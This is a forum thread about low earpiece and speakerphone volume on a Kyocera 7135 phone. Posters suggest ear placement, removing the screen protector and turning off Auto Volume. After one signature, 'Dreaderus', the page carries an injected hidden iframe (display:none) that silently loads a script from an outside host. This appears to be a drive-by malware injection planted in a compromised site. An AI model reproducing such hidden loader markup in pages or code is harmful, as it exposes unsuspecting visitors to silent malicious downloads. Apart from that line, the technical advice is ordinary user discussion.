+ Reply to Thread

initial non impressive audio level (earpiece and speakerphone)

Anyone start off feeling the speakerphone was really low, and in a mall today (i know a bad place) i could not hear anything on this phone, however I have been in the same mall before on the same network, with a diff phone and not had this poor audio levels (the connection seems fine the sound is just very low)

I will do some testing, it might just be a bad day, I have another phone on the network gonna compare it and see, perhaps I have a bum earpierce?

Dreaderus<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Try moving the earpiece around on your ear. Seriously. I discovered this with my 6035, the sound is significantly affected by proper placement. You're probably putting the earpiece too high on your ear. Fortunately, it's a lot easier to get the hang of it with the 7135 due to the form and earhole placement. Others on the board have reported "low audio" problems too, and this has been the solution.
    ---------------
    The same thing we do every night, Pinky...

you might be right you know...hehe it is a small area where the sound comes out. Will investigate.

Dreaderus

This is going to sound pretty dumb. I had the same problem until I realized that the clear plastic "screen protector" that comes with the phone was covering the earphone. I moved it and I have no problems now.

u refering to the plastic on the metal on the outside of the phone? i still have that on i figure it makes no diff.

Dreaderus

any thoughts? were you refering to the plastic wrap on the metal outer case? to improve reception? I would assume that would not affect it much.

Dreaderus

I just got it and it sounds great after i removed the plastic covering and properly aligned with my ear!
    Moto Star Tac w/PIM-->Kyocera 6135-->Kyocera 7135-->Samsung i600-->Treo 600-->Treo 650-->Samsung i730-->Treo 700wx-->Treo 750-->Samsung i760

Optimus said "screen protector" so he probably means the one inside the clam, not the one covering the metal plate.

I wish my plate protector would've stayed on longer... I'm seeing small scratches already!

I had the speakerphone volume problem, too--some one suggested elsewhere to disable the Phone Prefs>>Call Volume>>Auto Volume. The speaker is definitely louder now...

You are right. I was talking about the one inside the clam. Just to comment on earpiece alignment with your ear, try using the phone with the top of the phone near the middle of your ear. It feels like the phone is too "low" on my ear but the sound is optimized that way (IMHO). Just some thoughts....